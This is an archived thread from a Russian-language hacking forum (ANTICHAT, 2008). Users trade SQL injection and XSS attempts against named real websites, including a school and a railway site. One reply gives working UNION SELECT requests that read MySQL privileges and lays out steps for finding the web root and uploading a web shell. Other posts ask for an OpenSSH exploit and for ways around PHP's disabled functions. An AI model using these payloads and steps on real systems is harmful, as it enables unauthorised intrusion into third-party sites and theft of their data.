HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1801  
Старый 25.04.2008, 22:00
cyberia
Новичок
Регистрация: 29.03.2008
Сообщений: 7
Провел на форуме:
78255

Репутация: 0
Question

Цитата:
Сообщение от jokester  
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация? )
Вот так не бывает:
"cybersales.information_schema.tables"

information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно
Кажется понял. Ты хочешь сказать, что по запросу select+table_name+from+information_schema.tables выводятся ВСЕ таблицы ВСЕХ баз данных? Не думаю я. Таблиц по этому запросу выводится штук 20. А баз дынных есть штук 45.

Последний раз редактировалось cyberia; 25.04.2008 в 22:12..
 
Ответить с цитированием

  #1802  
Старый 25.04.2008, 22:00
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))

Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
 
Ответить с цитированием

  #1803  
Старый 25.04.2008, 23:04
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

http://lasgy.tln.edu.ee/?smg=news&ca=2989+or+1%3D1+--+

Сканер показал слепую инъекцию,но у мя ничё не вышло тут. Наяба ? о_О

P.S. : Есть также дыра,позволяющая выполнить произвольный код в OpenSSH.тоже от сканера

Уязвимость существует из-за ошибки в процедуре обработки служебных сигналов. Уязвимость позволяет злоумышленнику аварийно завершить работу сервиса OpenSSH или выполнить произвольный код в системе. Для эксплуатации уязвимости необходимо чтобы сервис использовал GSSAPI аутентификацию (параметр GSSAPIAuthentication в файле конфигурации).

Прошу не бить за лог:Р,прост сплойта в нете не нашёл,а сам написать имхо не могу =_=(Знал бы не спрашивал =)).Есть у кого какие идеи ?)

Последний раз редактировалось Велемир; 25.04.2008 в 23:27..
 
Ответить с цитированием

  #1804  
Старый 26.04.2008, 10:01
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию

Цитата:
Сообщение от Thrasher88  
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))

Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
почитай вот эти статьи, найдешь много полезно про XSS:
https://forum.antichat.ru/showthread.php?t=11807
https://forum.antichat.ru/showthread.php?t=44125
https://forum.antichat.ru/showthread.php?t=42951
 
Ответить с цитированием

  #1805  
Старый 26.04.2008, 12:31
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

привет всем!
что делать если при таком запросе -9999+UNION+SELECT+1,2,user(),4/*
ну или место юзер датабэйс и.т.д. просто появляется чистый экран.
 
Ответить с цитированием

  #1806  
Старый 26.04.2008, 12:42
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

ссылку
 
Ответить с цитированием

  #1807  
Старый 26.04.2008, 12:59
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223

Репутация: 5
По умолчанию

www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* как найти полную директорию для записи файла и заливки шелла????
 
Ответить с цитированием

  #1808  
Старый 26.04.2008, 13:12
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

У тебя рутовый пользователь
Код:
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(user()+using+cp1251)+from+mysql.user/* HTTP/1.0
и есть file_priv=Y, значит можешь читать\писать файлы
Код:
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(file_priv+using+cp1251)+from+mysql.user+where+user='root'/* HTTP/1.0
Причем маджик_квотс_гпс отключены.
Твои действия: ищешь httpd.config там ищешь пути до virtualhosts, где в document_root будет лежать полный путь, далее с заливкой шелла по обстоятельствам: можно либо почитать исходники авторизации админки или какие нибудь конфиги, либо влить прямым запросом - пути и способ залить шелл через запрос можно найти здесь на форуме
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 26.04.2008 в 13:15..
 
Ответить с цитированием

  #1809  
Старый 26.04.2008, 14:27
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

немного поправлю, точное название httpd.conf или vhosts.conf
кстати наличие magic quotes становится для меня во многих случаях не актуально
https://forum.antichat.ru/showpost.php?p=663815&postcount=39
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #1810  
Старый 26.04.2008, 16:27
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Цитата:
Сообщение от Спайдер  
омг! пиздец
выполни phpinfo() , найди поля disable functions и скопипасть сюда
disable_function:
Local Value.
system,exec,shell_exec,passthru,popen
Master Value
system,exec,shell_exec,passthru,popen


Дальше как?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ